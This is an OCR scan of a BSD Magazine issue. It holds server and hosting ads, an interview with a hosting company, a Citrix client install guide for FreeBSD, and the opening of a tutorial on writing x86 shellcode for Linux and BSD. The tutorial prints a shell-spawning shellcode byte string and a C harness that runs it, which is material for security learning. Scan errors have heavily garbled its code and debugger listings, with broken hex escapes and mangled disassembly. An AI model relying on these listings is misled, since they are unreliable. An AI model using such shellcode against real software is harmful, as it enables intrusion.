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Greenest, most energy-efficient 
blade server in the industry! 
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The new Triton TwinBlade Server is the most technologically advanced blade server system in the industry, 
and the ideal solution for power-efficiency, density, and ease of management. 


The Triton TwinBlade Server supports 
up to 120 DP servers with 240 Intel® 
Xeon” 5600/5500 series processors 
per 42U rack, achieving an umatched 
0.35U per DP node. Up to two 4x QDR 
(40 Gbps) Infiniband switches, 1OGbE 
switches or pass-through modules give 
the TwinBlade the bandwidth to support 
the most demanding applications. 


With N+1 redundant, high efficiency 
(94%) 2500W power supplies, the 
TwinBlade is the Greenest, most energy- 
efficient blade server in the industry. The 


energy saved by the ixX-Triton TwinBlade 
Server will keep the environment cleaner 
and greener, while leaving the green in 
your bank account. 


Server management is also simple 

with the Triton Twin Blade Server. 
Remote access is available through SOL 
(Serial Over Lan), KVM, and KVM over 

IP technologies. A separate controller 
processor allows all of the Triton’s remote 
management and monitoring to function 
regardless of system failures, offering true 
Lights Out Management. 


Using the Triton’s management system, 
administrators can remotely control 
TwinBlades, power supplies, cooling 
fans, and networking switches. Users 
may control the power remotely to 
reboot and reset the Triton TwinBlade 
Center and individual Twin Blades, and 
may also monitor temperatures, power 
status, fan speeds, and voltage. 


For more information on the iX-Triton 
TwinBlade, or to request a quote, visit: 


http://www.iXsystems.com/tritontwinblade 


20 Server Compute Nodes in 7U of Rack Space 


The iX-TB4X2 chassis holds 10 TwinBlade servers and each 
TwinBlade supports two nodes. This gives the iX-TB4X2 chassis the 
ability to house 20 nodes in 7U of rack space. The powerful Triton 
TwinBlade achieves 0.35U per dual-processor node, and is twice as 
dense as the previous generation of dual-processor blades. 


A fully-loaded iX-Triton TwinBlade supports 40 Intel® Xeon® 
5600/5500 series processors and up to 2.5 TB DDR 
1333/1066/800MHz ECC Registered DIMM memory. In a 42U rack 
this translates into 120 nodes with 240 Intel® Xeon® 

5600/5500 series processors and 15 TB DDR 1333/1066/800MHz 
ECC Registered DIMM memory. 


» By replacing 1U servers with TwinBlade servers, the power 
savings of the iX-TB4X2 can reach more than $1000* per 
year, per server with reduced cooling costs added in. 


» Replacing 1U rackmount servers with an iX-TB4X2 Twin 
Blade can reduce carbon dioxide emissions by over 5.5 
metric tons.** 


> The iX-Triton TwinBlade delivers the most energy-efficient 
blade server in the industry with four N+1 redundant, high 
efficiency (94%) 2500W power supplies. 





* Electricity costs vary by location. 


** According to Energy Information Agency (a statistical agency of the U.S. Department of Energy), 
saving one kilowatt hour of electricity reduces carbon dioxide emissions by 1.43 pounds. 





Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Intel, the Intel lage, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the US. and other countries, 
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Up to 10 dual-node TwinBlades in a 7U 
Chassis, 6 Chassis per 42U rack 
Remotely manage and monitor 
TwinBlades, power supplies, cooling fans, 
and networking switches 

Hardware Health Monitor 

Virtual Media Over Lan (Virtual USB, 
Floppy/CD, and Drive Redirection) 
Integrated IPMI 2.0 w/ remote KVM over 
LAN/IP 

Remote Power Control 

Supports one hot-plug management 
module providing remote KVM and IPMI 
2.0 functionalities 

Up to four N+1 redundant, hot-swap 
2500W power supplies 

Up to 16 cooling fans 


Each of the TwinBlade’s 
two nodes features: 


Intel” Xeon” processor 5600/5500 series, 
with OPI up to 6.4 GT/s 


Intel® 5500 Chipset 


Up to 128GB DDR3 1333/ 1066/ 800MHz 
ECC Registered DIMM / 32GB Unbuffered 
BL 


Intel® 82576 Dual-Port Gigabit Ethernet 
2x 2.5" Hot-Plug SATA Drive Trays 
Integrated Matrox G200eW Graphics 


Mellanox ConnectX ODR InfiniBand 
40Gbps or 10GbE support (Optional) 


Powertul. 
Intelligent. 
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Dear Readers! 
The calender is showing that autumn is here»but the 


weather still reminds us about the summer. Wherever Selet Il Sule 


Olga Kartseva 


you are and whatever you are doing - take a break olga. kartseva@software.com.pl 
and look into this issue. Contributing: 
s ; : ‘ ee Rob Somerville, Daniele Mazzocchio, Rashid N. Achilov, Joseba 

It might seem a little bit different to you this time, let Mendez, Laura Michaels 
US know how do you fee| about it Lukas Holt, Caryn Holt, Laura Michaels 
In this issue you will find the second part of Daniele’s SERED CR Ce 

: : d : : Marko Mil ic, Worth Bish d Mike Byb 
article: Network Monitoring with Nagios and Bel op heara ath hehe a esate 
OpenBSD. Art Director: 
lreneusz Pogroszewski 
Some of the articles wilfmention Linux this time, 
; oe Dae 

but don’t worry - it is just to make clear the diffirences ees rca 
between these two OS. 

You will find some information about Citrix and Se ae 


Pawet Marciniak pawe/@software.com.pl 


Festival in this issue and see some new authors 
contributing. 


Don’t forget about answering our surveys, they 


National Sales Manager: 
Ewa tozowicka 
ewa.lozowicka@software.com.pl 


are really useful for us. And we are still looking for Met Le 
: : : Ewa tozowicka 
authors for russian version of BSD Magazine, please ewa. lozowicka@software.com.pl 
feel free to send us your feedback. Bn a ae aN 
; ; / Karolina Lesinska 
Thank y ou and Sen reading ‘ karolina.lesinska@bsdmag.org 
Thank you! 
Advertising Sales: 
Olga Kartseva 
Ol ga Kartseva olga.kartseva@software.com.pl 
Editor in Chief eet peepae 
olga.kartseva@software.com.pl Software Press Sp. z 0.0. SK 


ul. Bokserska 1, 02-682 Warszawa 
Poland 
worldwide publishing 
tel: 1917 338 36 31 
www.bsdmag.org 


Software Press Sp z 0.0. SK is looking for partners from all over 
the world. If you are interested in cooperation with us, please 
contact us via e-mail: editors@bsdmag.org 


All trade marks presented in the magazine were used only for 
informative purposes. All rights to trade marks presented in the 
magazine are reserved by the companies which own them. 


The editors use automatic DTP system AWRWs 


Mathematical formulas created by Design Science MathType™. 
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Interview 
O06 Interview with Dirk H. Schulz 


Geniodata — Creative Data Solutions and Hosting. la interview 
with Dirk H. Schulz, which will give you a closer look at this 
company. 


GET STARTED 


10 Installing a Citrix Client on FreeBSD 
Andrew L. Gould 

Citrix, like Samba with WinBind and Rdesktop help us access 
services and applications that may be required for our jobs but 
may not be available for FreeBSD. These ports are important 
for FreeBSD Advocacy because they help us integrate FreeBSD 
into a Windows enterprise environment. 

In this article, | will discuss the steps for installing the current, 
xen application version of the Citrix client on FreeBSD 7.3 and 
FreeBSD 8.1. 


HOW TO’S 


14 Writing shellcode for Linux and BSD 
Daniele Mazzocchio 

A shellcode is a sequence of machine language instructions 

which an already-running program can be forced to execute by 

altering its execution flow through software vulnerabilities (e.g. 

stack overflow, heap overflow or format strings). 
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How To Convert Text to Voice Using 

Festival and Lame in FreeBSD 

Diego Montalvo 
In the summer of 2010 grew a bit bored of building search based 
apps so | decided to brush the dust off of old Bob IChatter code 
base. After tons of code rewriting and little sleep, Bob Chatter 
version 1.0.0 IM|Chat for WebOS devices was released. Release 
1.0.1 of Bob Chatter includes a service which converts real-time 
chat instances into voice files. After realizing first hand there was 
little documentation regarding FreeBSD and voice technology, | 
decided to write a tutorial where others could learn from. 


<3 4 FreeBSD Squid proxy with Parental 
Controls How-To 
Rob Somerville 
Traditionally, web pages were served via a webserver such as 
Apache and transmitted via the network on port 80 to a web- 
browser. 

While pages and content were cached in the local browser 
cache, on larger networks it made sense to use a caching 
proxy such as Squid to reduce external traffic over the net for 
frequently fetched pages such as Google. 


Network monitoring with Nagios and 

OpenBSD Part 2 

Daniele Mazzocchio 
One of Nagios’ key features is its extensibility; new functionality 
can be easily added thanks to its plugin-based architecture, the 
external command interface and the Apache (http://www.kernel- 
panic.it/openbsd/nagios/httpd.apache.org/) web server. In this 
chapter, we will take a look at a few common issues that can 
be addressed with some of the most popular addons (http:// 
www.nagiosexchange.org/) for Nagios. 


LET’S TALK 


5 (QD The Difference Between FreeBSD and 
Ubuntu in a Not So Technical Way 
Joshua Ebarvia 

As asystem administrator, | have been using various distributions 
of Linux and FreeBSD. | am comfortable in a mixed environment 
of *nix operating systems to provide network services. | will try 
to differentiate them and be unbiased as possible so as not to 
start a flame war. | enjoy working with both systems and | like 
the way they are. 
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Interview with 
Dirk H. Schulz 


genioDATA? 

Why yet another hosting comanpy? 

Our first idea was not to offer hosting services. We 
needed an environment for engineering and testing — 
building complex systems at customers’ sites means you 
have to do the engineering and testing somewhere else. 
And we were fed up with the typical test environment you 
puzzle up yourself — it had to be something professional, 
so we build up a production like environment in one of 
the best data centers and defined processes and usage 
rules. 


So you are not hosters from the beginning? 
No. We are system managers. We engineer, implement 
and run IT systems at our customers sites. 


Again: Why hosting then? 

That resulted from customer requests. When we told 
them of our engineering and testing data center, they 
wanted to place servers there and make use of certain 
services. The typical question was Couldn't you also do 
... for us there? 
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But that still is far from 
what you now offer, isn’t it? 
To keep things under control then we had to do a lot of 
standardization and process definition. On one hand we 
had customers running systems in our data center who 
expected reliable performance, on the other hand we still 
needed our engineering environment. We had to look at 
our own projects with the same service and process view 
like at our customers’ projects. 

The answer was tough standardization and minute 
discipline. We ended up defining lots of products the two 
of us could use: the customers and ourselves. 


What is the difference to mainstream hosting? 
We offer hosting, knowledge and consulting in modularized 
packages. The customer solves on his own whatever he 
can solve and takes from us what he needs on top of 
that, be it technical items, support or plain knowledge. 
The customer alone defines the parts that make up his 
individual environment. 

He can, let’s say, simply rent a virtual FreeBSD server 
and manage it on his own, but he can also outsource 
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part of the servers 

management to us 

or have us run a server 

farm completely. For 

administration on his own he 

can make use of community 

ressources or use our offers of 

support and consulting, whatever 
suits him best. 


That sounds great, but it still is not 
sufficient for uniqueness. Are there any USPs? 
Of course. We offer the biggest range of hosted 
operating systems — nearly all UNIXes and UNIX 
families are within. Additionally we are front runners 
when it comes to deploying enterprise techniques 
in still-not-enterprise-environments. You can _ easily 
rent a virtual NetBSD server, but where do you find a 
virtual NetBSD server that is run highly available in a 
clustered environment? Where can you have a MacOS 
X Server run including layered backups for additional 
data security? 


Enterprise environments are defined 

by prices that small and medium companies 
(SMCs) cannot pay, right? 

No, there is no correlation there. In an enterprise 
environment the focus is on availability, in SMCs the focus 
is on getting it running somehow. 


But SMCs depend on their IT the same way 
enterprises do, don’t they? 

Yes, they do. Email archives and digital file systems are 
more important today than analog files have been in 
previous decades. They just have to be available. Access 
times have to be much shorter nowadays. ,Always on’ is 
needed. 


What can you do 

to move the focus in SMCs to availability? 

No need to do that, they already start realizing 
necessities. Legal authorities are quite modern in their 
requirements: emails have to be archived completely, 
searchably and with a thorough security concept, 
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otherwise penalties can be painful. Share holders and 
auditors demand revision proof document archives. 
Banks are evaluating their customers’ IT strategies 
during rating processes (i. e. your credit costs depend 
on your IT setup). All that forces SMCs to refocus their 
IT concepts. 


Can availability be bought? 

If yes: What has to be considered? 

No, availability is not a question of money, but of discipline. 
You always have to go four steps: 


¢ engineer a detailed concept, 

¢ make a real world test of the concept before 
implementation, 

¢ implement and run a comprehensive monitoring, 

¢ do regular tests on every vital part. 


If you leave out just one step, you risk losing the benefit 
of the others as well. 


Can you name examples? 

Yes. My favorite one is backups. It is not enough to make 
use of really good backup software, you always have to 
test restorability of your backed up data. Again and again 
we hear that customers can not restore their data in that 
one case of emergency — even with € 100.000 backup 
software. 


Operating Systems are the worlds in the I) 
universe. Get yours: 

FreeBSD, NetBSD starting at € 25 

CentOS, OpenSuSE starting at € 25 

RHEL, SLES starting at € 42 

MacOS X Server starting at € 67 

Windows Server starting at € 42 


Got an idea? Make it live. 
In a genioDATA Server. 
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Itis not sufficient to 
implement something 
that should work — you 
have to make sure it does 
work. And if you do that, you 
can also use € O software as 
long as it does what you need. 
By the way: it is good practice 
to spend money if you get your 
money's worth. Spending lots of 
money to make yourself feel you have done 
the right thing just costs. 
You have to test thoroughly and regularly. Or get 
someone to do for you. 


How do you live up this principle 
in your hosting offers? 
For example there is lots of literature on what virtualization 
technique or product is the best — always comparing 
features. We could use that for decisions. Instead we test: 
150 virtual servers with 5 operating systems in a 6 months 
test run on each of them: Xen, VMware, Parallels Server, 
etc. We know very well now what is reliable and what 
is not. And we continue testing with every new release 
because the IT world changes fast. 

We rely on long term experience instead of well meant 
hopes. 


Let’s focus on money again: the four steps 

you named must be expensive for a small or 
medium company! 

That depends on how much previous engineering can 
be reused. If we have to invent something completely 
new there is ressources to commit, but we have 
manifold experience, we can reuse details from 
previous projects. That lessens the required ressources 
in engineering and pre production testing (steps one 
and two). Monitoring can in most parts be covered with 
previous work. 





Can you relate a success story to illustrate this? 
Yes. We have designed a middleware farm on base of 
Tomcat servers for a customer lately. We would have had 
to evaluate Tomcat session clustering against clustering 
via upstream load balancers, but we had run specialized 
tests on this comparison in another project for another 
customer. 

We only had to test if the customer’s software runs in 
the resulting environment. 


Of course our readers want to know what role 
BSD systems play in your projects! 

That depends. The advantages of BSD systems — 
mainly stability and very effective usage of resources 
— are really interesting in the enterprise market, but 
widely unknown there. When we propose the usage of 
BSD systems to hosting customers, they are afraid of 
not beeing able to migrate them to their own premises 
when they need to. 

But if the customer just rents a defined service matrix 
— let’s say a tiered webserver farm with certain features 
— then we are free to use BSD systems and in some cases 
we do. 

Our infrastructure systems (mail gateways, name 
servers and the like) are BSD based more and more. 


What future do you see for BSD systems? 

In a few years they will play a bigger role in the enterprise 
market than today. One important difference to Linux 
systems is their focus on a small set of necessities. Linux 
is multifarious and manifold, but that also leads to lots of 
possible errors. It is intense work to set up a slim, focused 
Linux system. 

And then there is another phenomenon: The BSD 
developers claim to produce code of a better quality, and 
our long term tests seem to point at the same direction. 

Now it is not only us who experiences this. And word 
is spreading. This will have an impact on BSD in the 
enterprise market. 

Meanwhile we strain to make BSD systems useable for 
small and medium companies. 
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Replicate your databases in high 


class data centers. 


Operating Systems are the worlds in the IT 
universe. Get yours: 

FreeBSD, NetBSD starting at € 25 

CentOS, OpenSuSE starting at € 25 

RHEL, SLES starting at € 42 

MacOS X Server starting at € 67 

Windows Server starting at € 42 


Got an idea? Make it live. 


Have an email archive run by In a genioDATA Server. 
genioDATA that leaves nothing 


more to wish for. 


Copy your files to several sites to 
plan for desaster recoverage. 


CHLO DATA 


info@sccon,.de 


Need an ERP environment 
(enterprise ressource planning)? 
Have to operate a web(services) 
cluster with 99,999 % availability? 
Need an email environment where 
not one email gets lost? 


genioDATA engineers it. 


genioDATA runs it. 
You use it. 


www.geniodata.com/bsdi.html  +49(0)8092 862568 


GET STARTED 


Installing 


a Citrix Client on FreeBSD 





As our computing needs change, so does our criteria for 
selecting an operating system. Today, my job and my family 


are in different cities. 


What you will learn... 
¢ How to install Citrix on FreeBSD 


me to work from home on occasion. Since Citrix is 

my employer’s chosen method for remote access, 
my first criteria for selecting an operating system for home 
use Is its ability to run a Citrix client plugin. 

Citrix, like Samba with WinBind and Rdesktop help us 
access services and applications that may be required for 
our jobs but may not be available for FreeBSD. These 
ports are important for FreeBSD Advocacy because they 
help us integrate FreeBSD into a Windows enterprise 
environment. 

In this article, | will discuss the steps for installing the 
current, xen application version of the Citrix client on 
FreeBSD 7.3 and FreeBSD 8.1. 


Pe re | have a considerate boss who allows 


Assumptions/requirements 


¢ X Windows should be properly configured and 
running. 

¢ Internet access should be properly configured. 

¢ Linux emulation should be activated. (Add iinux _ 
enable="YES” tO /etc/re.conf and reboot) 

¢ You should have root access via su. 

¢ Ports should be up-to-date. For FreeBSD 8.1, | used 
the ports that were included on the installation DVD. 
For FreeBSD 7.3, | updated ports using portsnap on 
August 19, 2010. 
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What you should know... 
- FreeBSD 8.1 


¢ The Citrix client requires a Mozilla based internet 
browser. | recommend Firefox3.5 or Seamonkey 
because they also work with the Java plugin. 


The topics above are covered adequately by the 
FreeBSD handbook, which can be found here: 

http://www.freebsd.org/doc/en_US.ISO8859-1/books/ 
handbook/ 


Linux Base Port 
You will need to install a 1inux base port for Linux emulation. 
The Citrix client works with linux _base-fc4 and linux _base- 
£8, but does not work with iinux base-f10. Unfortunately, 
FreeBSD 8.1 and PC-BSD 8.1 use linux base-fio by 
default. 

For FreeBSD 7.3 simply execute: 


‘pkg add -r linux base-fc4’ 
For FreeBSD 8.1, perform the following : 

‘echo “OVERRIDE LINUX BASE PORT=f£8” >> /etc/make.conf’ 
‘echo “OVERRIDE LINUX NONBASE PORTS=f£8”" >> /etc/make.conf’ 
“pkg. add -r linux base=rs’ 
You will need to rebuild any linux applications you have 


installed previously. 
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PC-BSD 8.1 uSe@S linux base-f10 aS a part of its base 
installation. Therefore, | do not recommend downgrading 
the 1inux base port. 


Installation 

The port for the current Citrix client can be found at / 
usr/ports/net/citrix xenapp. There is also and older client 
called citrix ica; but Citrix does not keep links to old Citrix 
client files on its download web pages. 


Using an internet browser 


¢ Go to Attp://www.citrix.com/English/SS/downloads/ 
details.asp?download/D=3323. This will take you to 
the Linux download page for Citrix clients. 

¢ Click on the Download button for tar.gz file of Version 
11.100. 

¢ Save the file 1inuxxg6-11.100.158406.tar.gz to your hard 
drive. 


In a terminal, use the su command to become root do the 
following: 


¢ Change the current directory to the location of where 
you saved the Citrix file. 

¢ Change the name of the file to citrix xenapp-linuxx86- 
11.100.158406.tar.gz. 

. Copy the file to /usr/ports/distiiles/. 

¢ Change the current directory to /usr/ports/net/citrix _ 
xenapp/. 

e Execute ‘make install clean-depends’. 


FreeBSD will now install of the dependencies required for 
citrix xenapp. When it’s done, it will run the installation/ 
configuration script for the Citrix client. You will be asked 
the questions below. | have noted the answers | used. 


Question 1 
Select a setup option: 


1. Install Citrix Receiver for Linux 11.100 
2. Remove Citrix Receiver for Linux 11.100 
3. Quit Citrix Receiver for Linux 11.100 setup 
Enter option number 1-3 [1]: 
Answer: 1 


Question 2 
Please enter the directory in which Citrix Receiver for 


Linux is to be installed. 


[default /usr/local/ICAClient] 
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or type “quit” to abandon the installation: 
Answer: | pressed enter to accept the default. 


Question 3 
You have chosen to install Citrix Receiver for Linux 11.100 
in fusr/ local/ICAClient: 
Proceed with installation? [default nj: 
Answer: y 


Question 4 
CITRIX(R) LICENSE AGREEMENT 

Use of this component is subject to the Citrix license 
covering the Citrix product(s) with which you will be using 
this component. This component is only licensed for use 
with such Citrix product(s). 
CTX code EP T A34320 

Select an option: 


1. | accept 
2. | do not accept 
3. Enter option number 1-2 [2]: 
Answer: 1 


Question 5 
Could not find a browser installation on your system. 
Is a browser installed? [default n]: 
Answer: y 


Question 6 
Integration complete. 
No GNOME or KDE directories were found, skipping 
integration. 
return: Illegal number: -1 
Do you want to install USB support? [default n]: 
Answer: n 


Question 7 
Select a setup option: 


1. Install Citrix Receiver for Linux 11.100 
2. Remove Citrix Receiver for Linux 11.100 
3. Quit Citrix Receiver for Linux 11.100 setup 
Enter option number 1-3 [2]: 
Answer: 3 


CITRIX 


BSD . 





MAGAZINE 


GET STARTED 


eee at ET taints] 


‘You have chosen to open 
launch.ica 
which is a ICA file 
from: https:/ 


What should Firefox do with this file? 
(C) Open with 
@{SaveFle a ne: 


[_] Do this automatically for files like this from now on. 


Browse... 





Figure 1. A window asking what to do with the file launch.ica 


ar Opening launch.ica 
‘You have chosen to open 
launch.ica 
which i a: ICA file 
from: https: 


What should Firefox do with this file? 


(*) Openwith wica 7 | 
(C) Save File 
[7\[te te mctornaticaly for fine lee thas Gomnew en] 


Settings can be changed using the Applications tab in 


% cancel Sox | 


Figure 2. Jo prevent repeating this step, check the box 








ee eT as 


Resources 


http://people.freebsd.org/~tabthorpe/ 
http://www.freebsd.org/doc/en_US.ISO8859-1/books/ 
handbook/ 





installed, try again, or logoff. | selected the Already 
installed button. 

3 The next page | saw was the Citrix menu page where 
| could select an application to run! 


Once | selected an application, a window (see 
Figure 1) opened, asking me what to do with the file 
Launen., ita. 

Click on the Browse button and go to /usr/iocal/ 
Icaclient/, Select the file wfica and click on the Open 
button. Then, so you don't have to repeat this step, check 
the box to Do this automatically for files like this from now 
on. This window should now look like Figure 2. 

Once this has been done, you should be able to use the 
applications/services made available through the Citrix 
portal. 

You may get a message that you have not chosen to 
trust the server’s security certificate. The one | received 
is in Figure 3. 


You have not chosen to trust "“GlobalSign Root CA", the issuer of the server's security certificate (SSL error 61). 





Figure 3. A message showing that you have not chosen to trust the server's security certificate 


Configuring Firefox 
| chose Firefox3.5 as my browser for using the Citrix 
client; but any mozilla-based browser will suffice. 

Open your browser using your normal, non-root user. 
From the menu, select Edit/Preferences. When the 
Preferences window opens, click on Content. If you have 
the Block pop-up windows option checked, click on the 
Exceptions button and add your company’s Citrix server's 
website to the exceptions list. Then you can close the 
Preferences window. 

In your browser, go to your Citrix server’s website. At 
this point, | can only address matters as they occur with 
my employer's Citrix website. Your setup and experience 
may differ. Here’s how it went for me: 


1 | reached a login page, so | logged in. 

2 | was taken to a page that stated that a Citrix 
client could not be detected. | was given options to 
download a client, state that a client was already 


BSD 


MAGAZINE 


To fix this, download the certificate issuer’s (GlobalSign 
Root CA in this case) root certificate and copy it to the 
directory: 


/usr/local/ICAClient/keystore/cacerts/ 


It is important to emphasize here that importing the 
certificates into your browser’s keystore will not solve 
the problem. In fact, your browser may already have 
the certificates. The Citrix client does not use Firefox's 
certificate keystore. 

At this point | was able to open and use the applications 
that were available on the Citrix portal, and access files on 
my employer’s network. | hope you meet with the same, 
happy Success. 

| would like to thank port maintainer Thomas Abthorpe for 
his work on the Citrix client ports, his patience and his help. 


ANDREW L. GOULD 
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for Linux and *BSD 


Writing shelicode 


A shellcode is a sequence of machine language instructions 
which an already-running program can be forced to execute 
by altering its execution flow through software vulnerabilities 
(e.g. stack overflow, heap overflow or format strings). 


What you will learn... 
« How to write a shellcode (verifying,examining etc.) 


n other words, it is the notorious arbitrary code 
which can be run on systems affected by specific 
vulnerabilities. Typically, a shellcode looks like: 


char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\ 
x76\x08\x89\x46" 
"\x0c\xb0\x0b\x8d\xle\x8d\x4e\x08\x8d\ 
x56\x0c\xcd\x80" 
"\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\ 


x2£\x73\x68"; 


that is a sequence of binary bytes (machine language). 

The purpose of this document is to introduce some of 
the most widespread techniques for writing shellcode 
for Linux and *BSD systems running on the IA-32 (x86) 
architecture. 

You may wonder why you should learn anything about 
writing shellcode, since you can find a lot of ready-to-use 
shellcodes on the internet (after all, that's what copy and 
paste is for). Anyway, | think there are at least two good 
reasons: 


¢ first of all, it's always a good idea to analyze someone 
else's shellcode before executing it, just to know 
what's going to happen and to avoid bad surprises 
(we will discuss this later (http:/,www.kernel-panic. it/ 
security/shellcode/shellcode6.htm!) in detail); 
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What you should know... 


« Have some basic knowledge on OpenBSD and Linux 


¢ besides this, keep in mind that the shellcode may 
have to run in the most diverse environments (input 
filtering, string manipulation, IDS...) and, therefore, 
you should be able to modify it accordingly. 





Listing 1. Syscalls are defined in the /usr/src/linux/include/ 
asm-i386/unistd.h file, and each is paired with a number 


jusr/ stec/ Linux) include/asm—-1386/unistd. lh 
#ifndef ASM 1386 UNISTD H 
#define ASM 1386 UNISTD H 


Te 
* This file contains the system call numbers 


ey 


#define NR exit 
#define | NR fork 
#define | NR_ read 
#define | NR write 
#define | NR open 
#define NR close 
#define | NR waitpid 
#define | NR_ creat 
ae 
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We would like to thank all of attendees for participating 
in the meetBSD 2010 Conference. 

We hope that meetBSD 2010 has allowed you to widen 
your knowledge, meet old and new friends who share 
common interests from BSD world. 


For those who weren't there 
— the meetBSD 2010 Conference video tracks, 
slides from all presentations and photos are now available! 


Check here: http://meetbsd.org/ | 
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HOW TO’S 


A good knowledge of IA-32 assembly programming 
is assumed, since we won't dwell much on strictly 
programming topics, such as the use of registers, 
memory addressing or calling conventions. 

Anyway, the appendix provides a short bibliography 
useful to anyone who wants to learn the basics of 
assembly programming or just to refresh one's memory. 
Last, a little knowledge of Linux, *BSD and C can be 
helpful... 


Linux system calls 

Though shellcodes can do almost anything, they're 
ususally aimed at spawning a (possibly privileged) shell 
on the target machine (that's where the name shellcode 
comes from...). 

The easiest and fastest way to execute complex 
tasks in assembler is using system calls (or syscalls, 
as their friends call them). System calls constitute the 
interface between user mode and kernel mode; in other 
words, system calls are the means by which userland 
applications obtain system services from the kernel, such 
as managing the filesystem, starting new processes, 
accessing devices, etc. 

Syscalls are defined in the /usr/src/1inux/include/asm- 
i386/unistd.h file, and each is paired with a number: see 
Listing 1. 

There are normally two ways to execute a syscall: 


¢ triggering the 0x80 software interrupt; 
¢ using the libc wrapper functions. 


The first method is much more portable, since it is 
based on system calls defined in the kernel code 
and, therefore, common to all Linux distributions. The 
second method, which uses the addresses of the 
C functions, instead, is hardly portable among different 
distributions, if not among different releases of the 
same distribution. 


int 0x80 

Let's take a look at the first method. When the CPU 
receives a Ox80 interrupt, it enters kernel mode and 
executes the requested function, getting the appropriate 
handler through the Interrupt Descriptor Table. 

The syscall number must be specified in zax, which 
will eventually contain the return value. The function 
arguments (up to six), instead, are passed in the sepx, 
ECX, EDX, ESI, EDI and esp registers (exactly in this order 
and using only the necessary registers). If the function 
requires more than six arguments, you need to put them 
in a structure and store the pointer to the first argument 
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Listing 2. The main page tells us that it requires only one 
parameter 


iam Z eae 


Seon 2) Linux Programmer's Manual TEXT 2) 
NAME 

Lexy SEX = tormimere the Curcenc process 
SYNOPSIS 


ZiNncluae <untsSeo. h> 


OU a Cche (nlite Sate wS) 


Listing 3. Jo compile with gdb and disassemble 


Sigdb —/ exit 

GNU gdb 6.1-debian 

Copyright 2004 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General 
Public License, and you are 

welcome to change it and/or distribute copies of it 
under certain conditions. 

Type "show copying" to see the conditions. 

There 1s absolutely no warranty for GDB. Type "show 
warranty" for details. 

Tits |GhBewas scOnigured) as "153 c0—linux' 2... Using ost 
libthread db library "/lib/ 
IPP tie eacm less O- bax 


(gdb) break main 
Breakpoint 1 at 0x804836a 
(gdb) run 


Starting program: /ramdisk/var/tmp/ exit 


Breakpoint 1, 0x0804836a in main () 











(gdb) ‘disas main 

Dump of assembler code for function main: 
0x08048364 <maint+0>: push Sebp 

0x08048365 <maintl>: mov sesp, sebp 
0x08048367 <main+3>: sub $0x8, esp 
Ox0804836a <mainto>: and OM chi hh by oso 
0x0804836d <main+9>: mov SOx0, eax 
0x08048372 <main+14>; sub Sax, SESP 
Ox08048374 <maint ler: movl $0x0, (Sesp) 
Ox0304¢3/6 <Main+23>: cal 0x8048284 <exit> 


End of assembler dump. 


(gdb) 
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in esx. Note: Linux kernels prior to 2.4 didn't use the zsr 
register for passing arguments and, therefore, could pass 
only up to 5 arguments using registers. 

After the syscall number and the parameters have been 
stored in the appropriate registers, the 0x80 interrupt is 
executed: the CPU enters kernel mode, executes the 
system call and returns the control to the user process. 

To recap, to execute a system call, you need to: 


¢ store the syscall number in zax; 
¢ store the syscall arguments 
registers or: 


In the appropriate 


¢ create an in-memory structure containing the 
syscall parameters, 
¢ store in esx a pointer to the first argument; 
¢ execute the 0x80 software interrupt. 


Now let's take a look at the most classic example: the _ 
exit(2) syscall. We know from the /usr/src/linux/include/ 
asm-i386/unistd.h file (See above) that it is number 1. The 
man page tells us that it requires only one parameter 
(status): see Listing 2. 

which we will store in the esx register. Therefore, the 
instructions for executing this syscall are: 





Listing 4. Executing the system call 


(gdb) disas exit 
Dump of assembler code for function exit: 
ee el 
Ox40052aed <exit+141>: mov 
Ox40052af0 <exit+144>: mov 
Ox400S2Zans <exatri4 i: Scall 
eee 


End of assembler dump. 


0x8 (sebp) , seax 
%6eax, (SESP) 


Ox200 cedle —fexit- 


(gdb) disas ~exit 


DUMP "On assemoler code for fumepion sexi: 


O=200cedJe™-fexiem. mov 0x4 (esp) , sebx 
Ox400cedal <exiti4: MOV Une paca 
x70 cede exit, aietie $0x80 
0x400ceda7? <_exitt1l1l>: mov SO0x1, %eax 
Ox400cedac <_exit+16>: int $0x80 

Ox De Stites weer ene 

Ox40cedake sexi o> a nep 





End of assembler dump. 


(gdb) 


Listing 5. Here are the first lines of the file (/usr/src/sys/kern/ 
syscalls.master file) on OpenBSD 


/usr/src/sys/kern/syscalls.master 


en 


ih STD (evOUdeSs ys pexre (iit dyads) } 
Z STD (ant “sys. Fork (vord) si 
5 STD ieoSoUZe tess eread | tiiewme, 


Void SUE size tonite) | 
4 STD HecelZe ees ys Whee (ile bel, 
Const. vole *bur..\ 


Siew eb yBe eee 


5 Sap (eUntSyc SOpel(Gonste char “pari,. \ 
NE alae, mode Lt mode); | 
6 Sp (ee Lnit, Sis ee lOset uit sre) ys 5) 





7 SED 1 Olde sysovaltd (pide pid, 
imt a Static, UMtsootmMons...\ 
Struck misage “*rusage) ; 4} 
8 COMPAT 43 Welle sys Crean (coms » «chic 


“path, mode & mode); } ocreat 


Listing 6. Getting the opcodes 


S nasm -f elf exit.asm 


> ObgGuUMp. —d. exit 0 
exit.o: file format elf32-1386 


Disassembly of section .text: 


00000000 <.text>: 


ce bb 00 00 00 00 mov $0x0, Sebx 
Bes oS 010000 200 mov SOx1, %eax 
a: ea 60 At $0x80 
9 
Listing 7. Testing the opcodes 
Sere xe sc 
char shellcode[] = "\xbb\x00\x00\x00\x00" 
NDS Vx0 D010 \c00\ 00" 
UNSea xc Ui): 
int, main) 
{ 
Int Anes 
COUN IME Grew 2 > 
(*ret) = (int) shellcode; 
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exit.asm 

mov eax, 1 ; Number of the exit(2) syscall 
mov ebx, 0 ; status 

int 0x80 ; Interrupt 0x80 


libc 

As we've stated before, a system call can also be 
executed by the means of a C function. So let's take 
a look at how to achieve the same results as above using 
a simple C program: 





Listing 8. Verifiyng the shellcode 


© See 4 /) SC cue 


exeeve (s/sc exile. ||" .sc exit” I, lye vars a7 |), = 0 
uname ({sys="Linux", node="Knoppix", ...}) = 0 
brk (0) = 0x8049588 


old tinap (NULL, 40967 PROT READ | PROT WRETE, MAP” 
PREV ALE | MAP ANONYMOUS; 1,0) = 
0x40017000 

access ("/etc/ld.so.nohwcap", F OK) = -]1 ENOENT 


(No such file or directory) 


open ("/etc/ld.so.preload", O RDONLY) = -1 ENOENT 
(No such file or directory) 

